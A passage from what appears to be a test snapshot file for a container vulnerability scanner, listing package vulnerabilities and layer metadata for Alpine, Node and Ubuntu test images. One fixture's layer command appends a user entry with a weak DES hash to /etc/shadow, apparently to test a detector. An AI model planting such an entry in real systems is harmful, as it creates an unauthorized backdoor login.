}, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c echo 'user-descrypt:chERDiI95PGCQ' /u003e/u003e /etc/shadow # buildkit", "is_empty": false, "base_image_index": 0 } ], "base_images": [ {}, { "name": "alpine", "tags": null }, { "name": "alpine", "tags": null } ] } } --- [TestCommand_OCIImage_JSONFormat/scanning_insecure_alpine_image_with_specific_detector_enabled - 2] Scanning local image tarball "./testdata/test-alpine-etcshadow.tar" --- [TestCommand_OCIImage_JSONFormat/scanning_node_modules_using_npm_with_some_packages - 1] { "results": [ { "source": { "path": "/lib/apk/db/installed", "type": "os" }, "packages": [ { "package": { "name": "busybox", "os_package_name": "busybox", "version": "1.36.1-r15", "ecosystem": "Alpine:v3.19", "commit": "d1b6f274f29076967826e0ecf6ebcaa5d360272f", "image_origin_details": { "index": 0 } }, "groups": 6, "vulnerabilities": [ "ALPINE-CVE-2023-42363", "ALPINE-CVE-2023-42364", "ALPINE-CVE-2023-42365", "ALPINE-CVE-2023-42366", "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] }, { "package": { "name": "busybox", "os_package_name": "busybox-binsh", "version": "1.36.1-r15", "ecosystem": "Alpine:v3.19", "commit": "d1b6f274f29076967826e0ecf6ebcaa5d360272f", "image_origin_details": { "index": 0 } }, "groups": 6, "vulnerabilities": [ "ALPINE-CVE-2023-42363", "ALPINE-CVE-2023-42364", "ALPINE-CVE-2023-42365", "ALPINE-CVE-2023-42366", "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] }, { "package": { "name": "openssl", "os_package_name": "libcrypto3", "version": "3.1.4-r5", "ecosystem": "Alpine:v3.19", "commit": "b784a22cad0c452586b438cb7a597d846fc09ff4", "image_origin_details": { "index": 0 } }, "groups": 9, "vulnerabilities": [ "ALPINE-CVE-2024-13176", "ALPINE-CVE-2024-2511", "ALPINE-CVE-2024-4603", "ALPINE-CVE-2024-4741", "ALPINE-CVE-2024-5535", "ALPINE-CVE-2024-6119", "ALPINE-CVE-2024-9143", "ALPINE-CVE-2025-9230", "ALPINE-CVE-2025-9232" ] }, { "package": { "name": "openssl", "os_package_name": "libssl3", "version": "3.1.4-r5", "ecosystem": "Alpine:v3.19", "commit": "b784a22cad0c452586b438cb7a597d846fc09ff4", "image_origin_details": { "index": 0 } }, "groups": 9, "vulnerabilities": [ "ALPINE-CVE-2024-13176", "ALPINE-CVE-2024-2511", "ALPINE-CVE-2024-4603", "ALPINE-CVE-2024-4741", "ALPINE-CVE-2024-5535", "ALPINE-CVE-2024-6119", "ALPINE-CVE-2024-9143", "ALPINE-CVE-2025-9230", "ALPINE-CVE-2025-9232" ] }, { "package": { "name": "busybox", "os_package_name": "ssl_client", "version": "1.36.1-r15", "ecosystem": "Alpine:v3.19", "commit": "d1b6f274f29076967826e0ecf6ebcaa5d360272f", "image_origin_details": { "index": 0 } }, "groups": 6, "vulnerabilities": [ "ALPINE-CVE-2023-42363", "ALPINE-CVE-2023-42364", "ALPINE-CVE-2023-42365", "ALPINE-CVE-2023-42366", "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] } ] }, { "source": { "path": "/prod/app/node_modules/.package-lock.json", "type": "artifact" }, "packages": [ { "package": { "name": "cryo", "version": "0.0.6", "ecosystem": "npm", "image_origin_details": { "index": 14 } }, "groups": 1, "vulnerabilities": [ "GHSA-38f5-ghc2-fcmv" ] }, { "package": { "name": "minimist", "version": "0.0.8", "ecosystem": "npm", "image_origin_details": { "index": 13 } }, "groups": 2, "vulnerabilities": [ "GHSA-vh95-rmgr-6w4m", "GHSA-xvch-5gv4-984h" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "image_metadata": { "os": "Alpine Linux v3.19", "layer_metadata": [ { "diff_id": "sha256:...", "command": "ADD file:37a76ec18f988775...", "is_empty": false, "base_image_index": 4 }, { "diff_id": "", "command": "CMD [/"/bin/sh/"]", "is_empty": true, "base_image_index": 3 }, { "diff_id": "", "command": "ENV NODE_VERSION=20.11.1", "is_empty": true, "base_image_index": 2 }, { "diff_id": "sha256:...", "command": "RUN /0addgroup -g 1000 no...", "is_empty": false, "base_image_index": 1 }, { "diff_id": "", "command": "ENV YARN_VERSION=1.22.19", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "RUN /0apk add --no-cache ...", "is_empty": false, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "COPY file:4d192565a7220e1...", "is_empty": false, "base_image_index": 1 }, { "diff_id": "", "command": "ENTRYPOINT [/"docker-entry...", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "CMD [/"node/"]", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "ARG MANAGER_VERSION=10.2.4", "is_empty": true, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "WORKDIR /prod/app", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "RUN |1 MANAGER_VERSION=10...", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "RUN |1 MANAGER_VERSION=10...", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "RUN |1 MANAGER_VERSION=10...", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "RUN |1 MANAGER_VERSION=10...", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "RUN |1 MANAGER_VERSION=10...", "is_empty": false, "base_image_index": 0 } ], "base_images": [ {}, { "name": "library/node", "tags": null }, { "name": "ayan4m1/maven-node", "tags": null }, { "name": "alpine", "tags": null }, { "name": "alpine", "tags": null } ] } } --- [TestCommand_OCIImage_JSONFormat/scanning_node_modules_using_npm_with_some_packages - 2] Scanning local image tarball "./testdata/test-node_modules-npm-full.tar" --- [TestCommand_OCIImage_JSONFormat/scanning_ubuntu_image - 1] { "results": [ { "source": { "path": "/var/lib/dpkg/status", "type": "os" }, "packages": [ { "package": { "name": "coreutils", "os_package_name": "coreutils", "version": "8.32-4.1ubuntu1.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2016-2781", "UBUNTU-CVE-2025-5278" ] }, { "package": { "name": "dpkg", "os_package_name": "dpkg", "version": "1.21.1ubuntu2.3", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7768-1", "UBUNTU-CVE-2025-6297", "UBUNTU-CVE-2026-2219" ] }, { "package": { "name": "gcc-12", "os_package_name": "gcc-12-base", "version": "12.3.0-1ubuntu1~22.04", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7700-1", "UBUNTU-CVE-2022-27943", "UBUNTU-CVE-2023-4039" ] }, { "package": { "name": "gnupg2", "os_package_name": "gpgv", "version": "2.2.27-3ubuntu2.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 5, "vulnerabilities": [ "USN-7412-1", "USN-7946-1", "UBUNTU-CVE-2022-3219", "UBUNTU-CVE-2025-30258", "UBUNTU-CVE-2025-68972", "UBUNTU-CVE-2025-68973", "USN-7412-2" ] }, { "package": { "name": "util-linux", "os_package_name": "libblkid1", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "glibc", "os_package_name": "libc-bin", "version": "2.35-0ubuntu3.8", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-8005-1", "USN-7259-1", "USN-7541-1", "USN-7760-1", "UBUNTU-CVE-2016-20013", "UBUNTU-CVE-2025-0395", "UBUNTU-CVE-2025-15281", "UBUNTU-CVE-2025-4802", "UBUNTU-CVE-2025-8058", "UBUNTU-CVE-2026-0861", "UBUNTU-CVE-2026-0915" ] }, { "package": { "name": "glibc", "os_package_name": "libc6", "version": "2.35-0ubuntu3.8", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-8005-1", "USN-7259-1", "USN-7541-1", "USN-7760-1", "UBUNTU-CVE-2016-20013", "UBUNTU-CVE-2025-0395", "UBUNTU-CVE-2025-15281", "UBUNTU-CVE-2025-4802", "UBUNTU-CVE-2025-8058", "UBUNTU-CVE-2026-0861", "UBUNTU-CVE-2026-0915" ] }, { "package": { "name": "libcap2", "os_package_name": "libcap2", "version": "1:2.44-1ubuntu0.22.04.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-7287-1", "UBUNTU-CVE-2025-1390" ] }, { "package": { "name": "gcc-12", "os_package_name": "libgcc-s1", "version": "12.3.0-1ubuntu1~22.04", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7700-1", "UBUNTU-CVE-2022-27943", "UBUNTU-CVE-2023-4039" ] }, { "package": { "name": "libgcrypt20", "os_package_name": "libgcrypt20", "version": "1.9.4-3ubuntu3", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2024-2236" ] }, { "package": { "name": "gnutls28", "os_package_name": "libgnutls30", "version": "3.7.3-4ubuntu1.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7635-1", "USN-8043-1", "USN-7281-1", "UBUNTU-CVE-2024-12243", "UBUNTU-CVE-2025-14831", "UBUNTU-CVE-2025-32988", "UBUNTU-CVE-2025-32989", "UBUNTU-CVE-2025-32990", "UBUNTU-CVE-2025-6395", "UBUNTU-CVE-2025-9820" ] }, { "package": { "name": "krb5", "os_package_name": "libgssapi-krb5-2", "version": "1.19.2-2ubuntu0.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7314-1", "USN-7257-1", "USN-7542-1", "UBUNTU-CVE-2018-5709", "UBUNTU-CVE-2024-26458", "UBUNTU-CVE-2024-26461", "UBUNTU-CVE-2024-3596", "UBUNTU-CVE-2025-24528", "UBUNTU-CVE-2025-3576" ] }, { "package": { "name": "krb5", "os_package_name": "libk5crypto3", "version": "1.19.2-2ubuntu0.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7314-1", "USN-7257-1", "USN-7542-1", "UBUNTU-CVE-2018-5709", "UBUNTU-CVE-2024-26458", "UBUNTU-CVE-2024-26461", "UBUNTU-CVE-2024-3596", "UBUNTU-CVE-2025-24528", "UBUNTU-CVE-2025-3576" ] }, { "package": { "name": "krb5", "os_package_name": "libkrb5-3", "version": "1.19.2-2ubuntu0.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7314-1", "USN-7257-1", "USN-7542-1", "UBUNTU-CVE-2018-5709", "UBUNTU-CVE-2024-26458", "UBUNTU-CVE-2024-26461", "UBUNTU-CVE-2024-3596", "UBUNTU-CVE-2025-24528", "UBUNTU-CVE-2025-3576" ] }, { "package": { "name": "krb5", "os_package_name": "libkrb5support0", "version": "1.19.2-2ubuntu0.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7314-1", "USN-7257-1", "USN-7542-1", "UBUNTU-CVE-2018-5709", "UBUNTU-CVE-2024-26458", "UBUNTU-CVE-2024-26461", "UBUNTU-CVE-2024-3596", "UBUNTU-CVE-2025-24528", "UBUNTU-CVE-2025-3576" ] }, { "package": { "name": "lz4", "os_package_name": "liblz4-1", "version": "1.9.3-2build2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2025-62813" ] }, { "package": { "name": "util-linux", "os_package_name": "libmount1", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "ncurses", "os_package_name": "libncurses6", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "ncurses", "os_package_name": "libncursesw6", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "pam", "os_package_name": "libpam-modules", "version": "1.4.0-11ubuntu2.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7580-1", "UBUNTU-CVE-2024-10041", "UBUNTU-CVE-2025-6020", "UBUNTU-CVE-2025-8941" ] }, { "package": { "name": "pam", "os_package_name": "libpam-modules-bin", "version": "1.4.0-11ubuntu2.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7580-1", "UBUNTU-CVE-2024-10041", "UBUNTU-CVE-2025-6020", "UBUNTU-CVE-2025-8941" ] }, { "package": { "name": "pam", "os_package_name": "libpam-runtime", "version": "1.4.0-11ubuntu2.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7580-1", "UBUNTU-CVE-2024-10041", "UBUNTU-CVE-2025-6020", "UBUNTU-CVE-2025-8941" ] }, { "package": { "name": "pam", "os_package_name": "libpam0g", "version": "1.4.0-11ubuntu2.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7580-1", "UBUNTU-CVE-2024-10041", "UBUNTU-CVE-2025-6020", "UBUNTU-CVE-2025-8941" ] }, { "package": { "name": "pcre2", "os_package_name": "libpcre2-8-0", "version": "10.39-3ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2022-41409" ] }, { "package": { "name": "pcre3", "os_package_name": "libpcre3", "version": "2:8.39-13ubuntu0.22.04.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2017-11164" ] }, { "package": { "name": "util-linux", "os_package_name": "libsmartcols1", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "openssl", "os_package_name": "libssl3", "version": "3.0.2-0ubuntu1.18", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 6, "vulnerabilities": [ "USN-7980-1", "USN-7786-1", "USN-7278-1", "UBUNTU-CVE-2024-13176", "UBUNTU-CVE-2024-41996", "UBUNTU-CVE-2024-9143", "UBUNTU-CVE-2025-15467", "UBUNTU-CVE-2025-27587", "UBUNTU-CVE-2025-68160", "UBUNTU-CVE-2025-69418", "UBUNTU-CVE-2025-69419", "UBUNTU-CVE-2025-69420", "UBUNTU-CVE-2025-69421", "UBUNTU-CVE-2025-9230", "UBUNTU-CVE-2026-22795", "UBUNTU-CVE-2026-22796", "UBUNTU-CVE-2026-2673" ] }, { "package": { "name": "gcc-12", "os_package_name": "libstdc++6", "version": "12.3.0-1ubuntu1~22.04", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7700-1", "UBUNTU-CVE-2022-27943", "UBUNTU-CVE-2023-4039" ] }, { "package": { "name": "systemd", "os_package_name": "libsystemd0", "version": "249.11-0ubuntu3.12", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7559-1", "UBUNTU-CVE-2023-7008", "UBUNTU-CVE-2025-4598", "UBUNTU-CVE-2026-4105" ] }, { "package": { "name": "libtasn1-6", "os_package_name": "libtasn1-6", "version": "4.18.0-4build1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7954-1", "USN-7275-1", "UBUNTU-CVE-2021-46848", "UBUNTU-CVE-2024-12133", "UBUNTU-CVE-2025-13151" ] }, { "package": { "name": "ncurses", "os_package_name": "libtinfo6", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "systemd", "os_package_name": "libudev1", "version": "249.11-0ubuntu3.12", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7559-1", "UBUNTU-CVE-2023-7008", "UBUNTU-CVE-2025-4598", "UBUNTU-CVE-2026-4105" ] }, { "package": { "name": "util-linux", "os_package_name": "libuuid1", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "libzstd", "os_package_name": "libzstd1", "version": "1.4.8+dfsg-3build1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2022-4899" ] }, { "package": { "name": "shadow", "os_package_name": "login", "version": "1:4.8.1-2ubuntu2.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-29383", "UBUNTU-CVE-2024-56433" ] }, { "package": { "name": "util-linux", "os_package_name": "mount", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "ncurses", "os_package_name": "ncurses-base", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "ncurses", "os_package_name": "ncurses-bin", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "shadow", "os_package_name": "passwd", "version": "1:4.8.1-2ubuntu2.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-29383", "UBUNTU-CVE-2024-56433" ] }, { "package": { "name": "perl", "os_package_name": "perl-base", "version": "5.34.0-3ubuntu1.3", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7434-1", "USN-7678-1", "UBUNTU-CVE-2023-31486", "UBUNTU-CVE-2023-47039", "UBUNTU-CVE-2024-56406", "UBUNTU-CVE-2025-40909" ] }, { "package": { "name": "tar", "os_package_name": "tar", "version": "1.34+dfsg-1ubuntu0.1.22.04.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2025-45582" ] }, { "package": { "name": "util-linux", "os_package_name": "util-linux", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "zlib", "os_package_name": "zlib1g", "version": "1:1.2.11.dfsg-2ubuntu9.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2026-27171" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "image_metadata": { "os": "Ubuntu 22.04.5 LTS", "layer_metadata": [ { "diff_id": "", "command": "/bin/sh -c #(nop) ARG RELEASE", "is_empty": true, "base_image_index": 2 }, { "diff_id": "", "command": "/bin/sh -c #(nop) ARG LAUNCHPAD_BUILD_ARCH", "is_empty": true, "base_image_index": 2 }, { "diff_id": "", "command": "/bin/sh -c #(nop) LABEL org.opencontainers.image.ref.name=ubuntu", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "/bin/sh -c #(nop) LABEL org.opencontainers.image.version=22.04", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "/bin/sh -c #(nop) ADD file:1b6c8c9518be42fa2afe5e241ca31677fce58d27cdfa88baa91a65a259be3637 in / ", "is_empty": false, "base_image_index": 1 }, { "diff_id": "", "command": "/bin/sh -c #(nop) CMD [/"/bin/bash/"]", "is_empty": true, "base_image_index": 1 } ], "base_images": [ {}, { "name": "ubuntu", "tags": null }, { "name": "laurentsogeti/pod_showname_formation_ckad", "tags": null } ] } } --- [TestCommand_OCIImage_JSONFormat/scanning_ubuntu_image - 2] Scanning local image tarball "./testdata/test-ubuntu.tar" --- [TestCommand_OCIImage_JSONFormat/ubuntu_image_with_go_OS_packages_json - 1] { "results": [ { "source": { "path": "/usr/bin/fzf", "type": "artifact" }, "experimental_pes": [ { "Plugin": "vex/os-duplicate/dpkg", "Justification": 1, "VulnIdentifiers": null, "MatchesAllVulns": true } ], "packages": [ { "package": { "name": "stdlib", "version": "1.18.1", "ecosystem": "Go", "image_origin_details": { "index": 7 } }, "groups": 84, "vulnerabilities": [ "GO-2022-0477", "GO-2022-0493", "GO-2022-0515", "GO-2022-0520", "GO-2022-0521", "GO-2022-0522", "GO-2022-0523", "GO-2022-0524", "GO-2022-0525", "GO-2022-0526", "GO-2022-0527", "GO-2022-0531", "GO-2022-0532", "GO-2022-0533", "GO-2022-0537", "GO-2022-0969", "GO-2022-1037", "GO-2022-1038", "GO-2022-1039", "GO-2022-1095", "GO-2022-1143", "GO-2022-1144", "GO-2023-1568", "GO-2023-1569", "GO-2023-1570", "GO-2023-1571", "GO-2023-1621", "GO-2023-1702", "GO-2023-1703", "GO-2023-1704", "GO-2023-1705", "GO-2023-1751", "GO-2023-1752", "GO-2023-1753", "GO-2023-1840", "GO-2023-1878", "GO-2023-1987", "GO-2023-2041", "GO-2023-2043", "GO-2023-2102", "GO-2023-2185", "GO-2023-2186", "GO-2023-2375", "GO-2023-2382", "GO-2024-2598", "GO-2024-2599", "GO-2024-2600", "GO-2024-2609", "GO-2024-2610", "GO-2024-2687", "GO-2024-2887", "GO-2024-2888", "GO-2024-2963", "GO-2024-3105", "GO-2024-3106", "GO-2024-3107", "GO-2025-3373", "GO-2025-3420", "GO-2025-3447", "GO-2025-3563", "GO-2025-3750", "GO-2025-3751", "GO-2025-3849", "GO-2025-3956", "GO-2025-4006", "GO-2025-4007", "GO-2025-4008", "GO-2025-4009", "GO-2025-4010", "GO-2025-4011", "GO-2025-4012", "GO-2025-4013", "GO-2025-4014", "GO-2025-4015", "GO-2025-4155", "GO-2025-4175", "GO-2026-4337", "GO-2026-4340", "GO-2026-4341", "GO-2026-4342", "GO-2026-4403", "GO-2026-4601", "GO-2026-4602", "GO-2026-4603" ] } ] }, { "source": { "path": "/var/lib/dpkg/status", "type": "os" }, "packages": [ { "package": { "name": "coreutils", "os_package_name": "coreutils", "version": "8.32-4.1ubuntu1.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2016-2781", "UBUNTU-CVE-2025-5278" ] }, { "package": { "name": "dpkg", "os_package_name": "dpkg", "version": "1.21.1ubuntu2.3", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7768-1", "UBUNTU-CVE-2025-6297", "UBUNTU-CVE-2026-2219" ] }, { "package": { "name": "gcc-12", "os_package_name": "gcc-12-base", "version": "12.3.0-1ubuntu1~22.04", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7700-1", "UBUNTU-CVE-2022-27943", "UBUNTU-CVE-2023-4039" ] }, { "package": { "name": "gnupg2", "os_package_name": "gpgv", "version": "2.2.27-3ubuntu2.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 5, "vulnerabilities": [ "USN-7412-1", "USN-7946-1", "UBUNTU-CVE-2022-3219", "UBUNTU-CVE-2025-30258", "UBUNTU-CVE-2025-68972", "UBUNTU-CVE-2025-68973", "USN-7412-2" ] }, { "package": { "name": "util-linux", "os_package_name": "libblkid1", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "glibc", "os_package_name": "libc-bin", "version": "2.35-0ubuntu3.8", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-8005-1", "USN-7259-1", "USN-7541-1", "USN-7760-1", "UBUNTU-CVE-2016-20013", "UBUNTU-CVE-2025-0395", "UBUNTU-CVE-2025-15281", "UBUNTU-CVE-2025-4802", "UBUNTU-CVE-2025-8058", "UBUNTU-CVE-2026-0861", "UBUNTU-CVE-2026-0915" ] }, { "package": { "name": "glibc", "os_package_name": "libc6", "version": "2.35-0ubuntu3.8", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-8005-1", "USN-7259-1", "USN-7541-1", "USN-7760-1", "UBUNTU-CVE-2016-20013", "UBUNTU-CVE-2025-0395", "UBUNTU-CVE-2025-15281", "UBUNTU-CVE-2025-4802", "UBUNTU-CVE-2025-8058", "UBUNTU-CVE-2026-0861", "UBUNTU-CVE-2026-0915" ] }, { "package": { "name": "libcap2", "os_package_name": "libcap2", "version": "1:2.44-1ubuntu0.22.04.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-7287-1", "UBUNTU-CVE-2025-1390" ] }, { "package": { "name": "gcc-12", "os_package_name": "libgcc-s1", "version": "12.3.0-1ubuntu1~22.04", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7700-1", "UBUNTU-CVE-2022-27943", "UBUNTU-CVE-2023-4039" ] }, { "package": { "name": "libgcrypt20", "os_package_name": "libgcrypt20", "version": "1.9.4-3ubuntu3", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2024-2236" ] }, { "package": { "name": "gnutls28", "os_package_name": "libgnutls30", "version": "3.7.3-4ubuntu1.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7635-1", "USN-8043-1", "USN-7281-1", "UBUNTU-CVE-2024-12243", "UBUNTU-CVE-2025-14831", "UBUNTU-CVE-2025-32988", "UBUNTU-CVE-2025-32989", "UBUNTU-CVE-2025-32990", "UBUNTU-CVE-2025-6395", "UBUNTU-CVE-2025-9820" ] }, { "package": { "name": "krb5", "os_package_name": "libgssapi-krb5-2", "version": "1.19.2-2ubuntu0.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7314-1", "USN-7257-1", "USN-7542-1", "UBUNTU-CVE-2018-5709", "UBUNTU-CVE-2024-26458", "UBUNTU-CVE-2024-26461", "UBUNTU-CVE-2024-3596", "UBUNTU-CVE-2025-24528", "UBUNTU-CVE-2025-3576" ] }, { "package": { "name": "krb5", "os_package_name": "libk5crypto3", "version": "1.19.2-2ubuntu0.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7314-1", "USN-7257-1", "USN-7542-1", "UBUNTU-CVE-2018-5709", "UBUNTU-CVE-2024-26458", "UBUNTU-CVE-2024-26461", "UBUNTU-CVE-2024-3596", "UBUNTU-CVE-2025-24528", "UBUNTU-CVE-2025-3576" ] }, { "package": { "name": "krb5", "os_package_name": "libkrb5-3", "version": "1.19.2-2ubuntu0.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7314-1", "USN-7257-1", "USN-7542-1", "UBUNTU-CVE-2018-5709", "UBUNTU-CVE-2024-26458", "UBUNTU-CVE-2024-26461", "UBUNTU-CVE-2024-3596", "UBUNTU-CVE-2025-24528", "UBUNTU-CVE-2025-3576" ] }, { "package": { "name": "krb5", "os_package_name": "libkrb5support0", "version": "1.19.2-2ubuntu0.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7314-1", "USN-7257-1", "USN-7542-1", "UBUNTU-CVE-2018-5709", "UBUNTU-CVE-2024-26458", "UBUNTU-CVE-2024-26461", "UBUNTU-CVE-2024-3596", "UBUNTU-CVE-2025-24528", "UBUNTU-CVE-2025-3576" ] }, { "package": { "name": "lz4", "os_package_name": "liblz4-1", "version": "1.9.3-2build2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ 